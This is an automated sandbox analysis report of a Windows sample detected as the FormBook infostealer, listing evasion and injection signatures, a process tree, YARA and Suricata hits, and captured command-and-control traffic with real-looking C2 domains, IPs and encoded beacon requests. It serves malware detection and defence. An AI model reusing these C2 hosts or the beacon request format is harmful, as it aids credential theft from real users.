Windows Analysis Report
72STaC6BmljfbIQ.exe

Overview

General Information

Sample name:72STaC6BmljfbIQ.exe
Analysis ID:1567386
MD5:a8058bb3809176bc3ee9e52df4960f87
SHA1:e417d18ba2bc63b1f4cc4d915e611aa963c1aec4
SHA256:04f2a2c8f4f414e1d33b5f2c3d8a0a3d915d5bb155914f16aec22e31e0ab2ebd
Tags: exe, user-abuse_ch

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 72STaC6BmljfbIQ.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe" MD5: A8058BB3809176BC3EE9E52DF4960F87)
    • 72STaC6BmljfbIQ.exe (PID: 8112 cmdline: "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe" MD5: A8058BB3809176BC3EE9E52DF4960F87)
    • 72STaC6BmljfbIQ.exe (PID: 8120 cmdline: "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe" MD5: A8058BB3809176BC3EE9E52DF4960F87)
    • 72STaC6BmljfbIQ.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe" MD5: A8058BB3809176BC3EE9E52DF4960F87)
      • PWhloTdOLAusO.exe (PID: 1748 cmdline: "C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 7428 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • PWhloTdOLAusO.exe (PID: 5268 cmdline: "C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5828 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.72STaC6BmljfbIQ.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

                Source: https://00808.vip/ | Avira URL Cloud: Label: malware
                Source: 72STaC6BmljfbIQ.exe | ReversingLabs: Detection: 57%
                Source: Yara match | File source: 6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.72STaC6BmljfbIQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: 72STaC6BmljfbIQ.exe | Joe Sandbox ML: detected
                Source: 72STaC6BmljfbIQ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 72STaC6BmljfbIQ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269044593.0000000000758000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PWhloTdOLAusO.exe, 00000007.00000002.3269332968.0000000000C2E000.00000002.00000001.01000000.0000000C.sdmp, PWhloTdOLAusO.exe, 0000000B.00000000.1996112338.0000000000C2E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1928191608.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1924126889.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 72STaC6BmljfbIQ.exe, 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1928191608.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1924126889.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269044593.0000000000758000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0060C7B0 FindFirstFileW,FindNextFileW,FindClose,8_2_0060C7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax8_2_005F9F20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi8_2_005FE3A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h8_2_02ED04BE

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49736 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 178.172.160.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49733 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49729 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49721 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49721 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 178.172.160.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49725 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49741 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49713 -> 172.67.218.146:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49713 -> 172.67.218.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49740 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 178.172.160.30:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49717 -> 178.172.160.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49737 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 178.172.160.30:80
                Source: DNS query: www.pbfgm.xyz
                Source: Joe Sandbox View | IP Address: 208.91.197.27
                Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox View | ASN Name: BCPL-SGBGPNETGlobalASNSG
                Source: Joe Sandbox View | ASN Name: BELPAK-ASBELPAKBY
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /fjd6/?uZ9=wvL0WTq0tnld4P&1JgHkl=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2HRrufKZisD26p6RGVEvaASN7Xi+5siy6qQN86qnR0uMGQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.pbfgm.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /izsd/?1JgHkl=xn6+B8LDUgeEZE/ewkyW9IYT/XMT7FP3Y1kTMJZ4lyb9girANxKziqifoVXMiOJsh7TOAwS+CRcOnA4ABGuIrM8s5EZR8uZbFlAOcv1SbgYYGS8/Ve3tsCmgzp0y8eq9Cg==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.phdcoach.proConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5hRbnJSY7Fzwy0niAuWJ/cwCJWSeGkVgu4T1N3P5ck3FVA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.elinor.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /s6zh/?1JgHkl=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMIJvPVmvlNwG1HEhIOCZ2tdwLUOtnvozCQbX7z6vra7jTg==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.smalleyes.icuConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dp9c/?1JgHkl=fIUCD8Yz2nphKcMxyO4tlSIcMJ/+EEeHC1g1rmDhwR9J1RiwCtlWpXo9Zxpli6GkENLWknkKup+McE28ApWDIV/QPDMFPo3/M02rRc2bBu1CVBDCQC56E21kZNcAcsBmiQ==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.btblxhh.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b8eq/?1JgHkl=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxDBcOFJwWRQ35vHrygTRMD3WsSY1KHoe5ieZg+FRRJHZJBA==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.primespot.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e1ut/?uZ9=wvL0WTq0tnld4P&1JgHkl=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iq978UInban7m5bgNeGe1Bvvfx4xUX/Ch8llqthzcuqNnDWQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mohawktooldie.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y54z/?1JgHkl=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2ZPd0sXm+50uRZ80dRU59tTW2JoKfzEPgRpmu9XiZqkNmHw==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.graviton.energyConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.pbfgm.xyz
                Source: global trafficDNS traffic detected: DNS query: www.phdcoach.pro
                Source: global trafficDNS traffic detected: DNS query: www.elinor.club
                Source: global trafficDNS traffic detected: DNS query: www.smalleyes.icu
                Source: global trafficDNS traffic detected: DNS query: www.btblxhh.top
                Source: global trafficDNS traffic detected: DNS query: www.primespot.live
                Source: global trafficDNS traffic detected: DNS query: www.mohawktooldie.online
                Source: global trafficDNS traffic detected: DNS query: www.graviton.energy
                Source: unknownHTTP traffic detected: POST /izsd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.phdcoach.proOrigin: http://www.phdcoach.proContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 207Cache-Control: no-cacheReferer: http://www.phdcoach.pro/izsd/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wglKkYd8WMmpy7vQ8L2rxbNGVU1FbJVBLRd%2BqdmuFtWpsdST8LcQd7Zb%2B7f6yDmdDr3JwzrGrfeBTlevNKyYTHz2A6t2b0KrDYHhh44DEMcFrolyMX%2FTq3PnFFvKA9Y%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3d3f06b704233-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=558&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 
20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendl
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:16:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
